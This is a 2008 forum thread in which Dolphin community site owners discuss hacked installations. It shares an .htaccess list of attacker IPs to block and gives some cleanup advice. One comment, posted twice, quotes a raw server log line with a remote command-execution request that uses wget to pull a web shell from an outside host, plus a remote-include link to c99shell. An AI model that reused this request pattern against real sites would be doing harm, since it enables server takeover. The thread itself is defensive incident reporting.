Dolphin Security Issues :(

praveenkv1988 posted 13th of July 2008 in Community Voice. 9 comments.

Today I happened to check a site that used dolphin and was hacked. I have found that they have deleted all the files from it and uploaded a script that fetch the contacts from orkut.com and sends the mail with a virus link (I am not posting that link here as that may be used by someone).

I have found those dolphin security issues that helped them to hack the sites. Currently I am in the process to develop the patch to fix all these issues. I know I will succeed in this.

I have checked that site and found many IPs that were used to hack the sites. I need to provide those IPs to all to block those IPs in your server.

To block these IPs in your host,

Open the file ".htaccess"

In the very beginning of it add the following.


<Files 403.shtml>
order allow,deny
allow from all
</Files>

deny from 72.37.237.58
deny from 209.147.127.217
deny from 64.106.212.3
deny from 207.249.0.39
deny from 61.100.0.185
deny from 75.102.21.29
deny from 82.165.253.62
deny from 212.122.200.198
deny from 61.222.167.139
deny from 204.2.183.2
deny from 62.65.159.212
deny from 61.152.188.244
deny from 66.98.214.4
deny from 216.180.239.124
deny from 209.147.127.216
deny from 216.17.101.237
deny from 74.52.133.2
deny from 89.108.67.119
deny from 67.228.37.156
deny from 195.70.36.107
deny from 85.235.153.11
deny from 202.164.225.11
deny from 70.85.102.132
deny from 66.218.77.68
deny from 203.146.102.38
deny from 72.9.246.154
deny from 66.113.100.51
deny from 79.180.146.69
deny from 193.34.16.75
deny from 72.36.159.108
deny from 216.127.94.127
deny from 83.170.74.164
deny from 213.186.38.21
deny from 207.210.91.2
deny from 67.228.181.76
deny from 202.221.143.111
deny from 64.15.136.210
deny from 203.157.185.8
deny from 200.149.77.40
deny from 217.172.29.12

Regards,

Praveen

 
Comments
·Oldest
·Top
Please login to post a comment.
sammie
strange because i checked a hack site too and the logs show the install of the viruses and Trojans and they all came from the following ip's some where logged on at the same time, 2-3-4-5 of them at the same time.

125.164.213.29 - - [09/Jul/2008:20:54:01 -0500] "GET //ray/modules/global/inc/content.inc.php?act=cmd&d=%2Fhsphere%2Flocal%2Fhome%2Frprinc%2FDOLPHIN_SITE.com%2Fray%2Fmodules%2Fglobal%2Finc%2F&cmd=wget+http%3A%2F%2Fh1.ripway.com%2Fsava%2Fshell%2Fbikang.txt&cmd_txt=1&submit=Execute see more HTTP/1.1" 200 5 "http://www.DOLPHIN_SITE.com//ray/modules/global/inc/content.inc.php?sIncPath=http://xakforum.*****.ru/tmp_upload/files/c99shell.txt?"

125.160.130.62
125.161.175.176
125.161.242.63
125.162.0.113
125.162.100.238
125.162.119.8
125.162.120.4
125.162.120.71
125.162.123.243
125.162.245.116
125.162.250.166
125.162.255.114
125.162.255.151
125.162.255.25
125.162.40.85
125.162.41.197
125.162.44.29
125.162.81.235
125.162.88.121
125.163.211.4
125.163.222.124
125.163.250.47
125.163.79.69
125.163.81.129
125.163.85.158
125.164.129.76
125.164.205.204
125.164.213.29
125.164.238.186
125.164.238.40
125.164.78.44
125.164.78.68
125.164.94.102
125.165.106.115
125.165.4.201
125.165.6.130
125.165.62.30
125.167.242.86
125.167.254.125
sammie
strange because i checked a hack site too and the logs show the install of the viruses and Trojans and they all came from the following ip's some where logged on at the same time, 2-3-4-5 of them at the same time.

yet you dont list one of the following ip's

125.164.213.29 - - [09/Jul/2008:20:54:01 -0500] "GET //ray/modules/global/inc/content.inc.php?act=cmd&d=%2Fhsphere%2Flocal%2Fhome%2Frprinc%2FDOLPHIN_SITE.com%2Fray%2Fmodules%2Fglobal%2Finc%2F&cmd=wget+http%3A%2F%2Fh1.ripway.com%2Fsava%2Fshell%2Fbikang.txt&cmd_txt=1&submit=Execute see more HTTP/1.1" 200 5 "http://www.DOLPHIN_SITE.com//ray/modules/global/inc/content.inc.php?sIncPath=http://xakforum.*****.ru/tmp_upload/files/c99shell.txt?"

125.160.130.62
125.161.175.176
125.161.242.63
125.162.0.113
125.162.100.238
125.162.119.8
125.162.120.4
125.162.120.71
125.162.123.243
125.162.245.116
125.162.250.166
125.162.255.114
125.162.255.151
125.162.255.25
125.162.40.85
125.162.41.197
125.162.44.29
125.162.81.235
125.162.88.121
125.163.211.4
125.163.222.124
125.163.250.47
125.163.79.69
125.163.81.129
125.163.85.158
125.164.129.76
125.164.205.204
125.164.213.29
125.164.238.186
125.164.238.40
125.164.78.44
125.164.78.68
125.164.94.102
125.165.106.115
125.165.4.201
125.165.6.130
125.165.62.30
125.167.242.86
125.167.254.125
DoLaugh
Praveenkv....what kind of security pack are you offering? Will this work for me since I cannot use .htaccess files and my global setting is set to ON?
praveenkv1988
Yes, that will work. Because I am not changing anything in .htaccess
3esolutions
http://www.countryipblocks.net/index.php

I found this online tool. I think if anybody is building a local network It's better to block all other Ips except your country.

I hope this will be helpful.
shorty
Is there any virus protection on a sever base application?
praveenkv1988
In our servers, we have installed AntiVirus and firewall to avoid these problems.
legacy
Yeah so my site was just hacked over the past week and it was done so by someone creating a profile, and somehow adding links to my index header linking to an offsite which was caught by StopBadware.org and was promted and firefox users that my site was an attack site annndd my site no longer showed up correctly in Firefox. i found and deleted the link and notified StopBadware.org and the reviewed the site and declared clean - hooray. Question is, how the crap did someone do that to me in the firstplace see more and how can i stop it??
praveenkv1988
You have to scan for any viruses. You have to hack proof your site. The most current version is free from most issues.
 
 
Below is the legacy version of the Boonex site, maintained for Dolphin.Pro 7.x support.
The new Dolphin solution is powered by UNA Community Management System.
PET:0.062771081924438